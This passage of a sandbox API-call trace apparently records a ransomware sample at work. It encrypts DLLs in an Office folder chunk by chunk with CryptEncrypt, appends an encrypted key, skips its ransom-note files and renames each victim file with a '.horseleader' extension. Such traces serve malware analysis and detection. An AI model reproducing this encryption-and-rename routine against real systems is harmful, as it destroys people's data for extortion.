dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.245] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7339ac00, ftCreationTime.dwHighDateTime=0x1cbdfc2, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7339ac00, ftLastWriteTime.dwHighDateTime=0x1cbdfc2, nFileSizeHigh=0x0, nFileSizeLow=0x90778, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SERCONV.DLL", cAlternateFileName="")) returned 1 [0245.245] lstrcmpiW (lpString1="SERCONV.DLL", lpString2="Windows") returned -1 [0245.245] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL") returned 71 [0245.245] StrStrIW (lpFirst="SERCONV.DLL", lpSrch=".horseleader") returned 0x0 [0245.245] lstrcmpW (lpString1="SERCONV.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.245] lstrcmpW (lpString1="SERCONV.DLL", lpString2="_uninstalling_.png") returned 1 [0245.245] lstrlenW (lpString=".testttjffg") returned 11 [0245.245] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL", lpSrch=".testttjffg") returned 0x0 [0245.245] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.245] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.246] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\serconv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.246] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL") returned 71 [0245.247] StrStrW (lpFirst="SERCONV.DLL", lpSrch=".txt") returned 0x0 [0245.247] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=591736) returned 1 [0245.247] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.247] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.250] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.250] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.251] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x45bbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.251] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.254] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.254] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.254] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x8b778, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.254] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.261] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.261] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.261] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.261] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.262] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.262] CloseHandle (hObject=0x158) returned 1 [0245.262] GetProcessHeap () returned 0x780000 [0245.262] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.262] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL.horseleader") returned 83 [0245.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\serconv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\serconv.dll.horseleader")) returned 1 [0245.263] GetProcessHeap () returned 0x780000 [0245.263] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.263] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xded68100, ftCreationTime.dwHighDateTime=0x1cb5970, ftLastAccessTime.dwLowDateTime=0xd68d72e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xded68100, ftLastWriteTime.dwHighDateTime=0x1cb5970, nFileSizeHigh=0x0, nFileSizeLow=0xc6b00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="USP10.DLL", cAlternateFileName="")) returned 1 [0245.264] lstrcmpiW (lpString1="USP10.DLL", lpString2="Windows") returned -1 [0245.264] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL") returned 69 [0245.264] StrStrIW (lpFirst="USP10.DLL", lpSrch=".horseleader") returned 0x0 [0245.264] lstrcmpW (lpString1="USP10.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.264] lstrcmpW (lpString1="USP10.DLL", lpString2="_uninstalling_.png") returned 1 [0245.264] lstrlenW (lpString=".testttjffg") returned 11 [0245.264] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL", lpSrch=".testttjffg") returned 0x0 [0245.264] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.264] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.264] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\usp10.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.266] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL") returned 69 [0245.266] StrStrW (lpFirst="USP10.DLL", lpSrch=".txt") returned 0x0 [0245.266] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=813824) returned 1 [0245.266] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.266] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.269] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.269] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.269] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x60d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.269] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.271] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.272] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.272] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xc1b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.272] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.274] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.275] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.275] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.275] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.275] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.275] CloseHandle (hObject=0x158) returned 1 [0245.275] GetProcessHeap () returned 0x780000 [0245.275] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.276] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL.horseleader") returned 81 [0245.276] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\usp10.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\usp10.dll.horseleader")) returned 1 [0245.277] GetProcessHeap () returned 0x780000 [0245.277] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.277] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x520efa00, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xd83064e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x520efa00, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0xc150, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VBAJET32.DLL", cAlternateFileName="")) returned 1 [0245.277] lstrcmpiW (lpString1="VBAJET32.DLL", lpString2="Windows") returned -1 [0245.277] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL") returned 72 [0245.277] StrStrIW (lpFirst="VBAJET32.DLL", lpSrch=".horseleader") returned 0x0 [0245.277] lstrcmpW (lpString1="VBAJET32.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.277] lstrcmpW (lpString1="VBAJET32.DLL", lpString2="_uninstalling_.png") returned 1 [0245.277] lstrlenW (lpString=".testttjffg") returned 11 [0245.277] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL", lpSrch=".testttjffg") returned 0x0 [0245.277] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.278] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.278] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\vbajet32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.278] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL") returned 72 [0245.278] StrStrW (lpFirst="VBAJET32.DLL", lpSrch=".txt") returned 0x0 [0245.279] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=49488) returned 1 [0245.279] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.281] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.281] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.282] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.283] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.283] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.283] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2150, lpOverlapped=0x0) returned 1 [0245.283] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdeb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.283] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2150, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2150, lpOverlapped=0x0) returned 1 [0245.283] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.284] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.284] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.284] CloseHandle (hObject=0x158) returned 1 [0245.284] GetProcessHeap () returned 0x780000 [0245.284] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.284] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL.horseleader") returned 84 [0245.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\vbajet32.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\vbajet32.dll.horseleader")) returned 1 [0245.285] GetProcessHeap () returned 0x780000 [0245.285] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.285] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a84d00, ftCreationTime.dwHighDateTime=0x1caa6a1, ftLastAccessTime.dwLowDateTime=0x5e5e73d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x14a84d00, ftLastWriteTime.dwHighDateTime=0x1caa6a1, nFileSizeHigh=0x0, nFileSizeLow=0x23f90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WISC30.DLL", cAlternateFileName="")) returned 1 [0245.285] lstrcmpiW (lpString1="WISC30.DLL", lpString2="Windows") returned 1 [0245.285] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL") returned 70 [0245.285] StrStrIW (lpFirst="WISC30.DLL", lpSrch=".horseleader") returned 0x0 [0245.286] lstrcmpW (lpString1="WISC30.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.286] lstrcmpW (lpString1="WISC30.DLL", lpString2="_uninstalling_.png") returned 1 [0245.286] lstrlenW (lpString=".testttjffg") returned 11 [0245.286] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL", lpSrch=".testttjffg") returned 0x0 [0245.286] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.286] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.286] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\wisc30.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.288] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL") returned 70 [0245.288] StrStrW (lpFirst="WISC30.DLL", lpSrch=".txt") returned 0x0 [0245.288] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=147344) returned 1 [0245.288] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.288] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.291] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.291] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.292] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xf7c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.293] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.293] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.293] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.293] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1ef90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.294] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.295] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.295] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.295] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.296] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.296] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.296] CloseHandle (hObject=0x158) returned 1 [0245.296] GetProcessHeap () returned 0x780000 [0245.296] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.296] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL.horseleader") returned 82 [0245.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\wisc30.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\wisc30.dll.horseleader")) returned 1 [0245.298] GetProcessHeap () returned 0x780000 [0245.298] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.298] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a84d00, ftCreationTime.dwHighDateTime=0x1caa6a1, ftLastAccessTime.dwLowDateTime=0x5e5e73d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x14a84d00, ftLastWriteTime.dwHighDateTime=0x1caa6a1, nFileSizeHigh=0x0, nFileSizeLow=0x23f90, 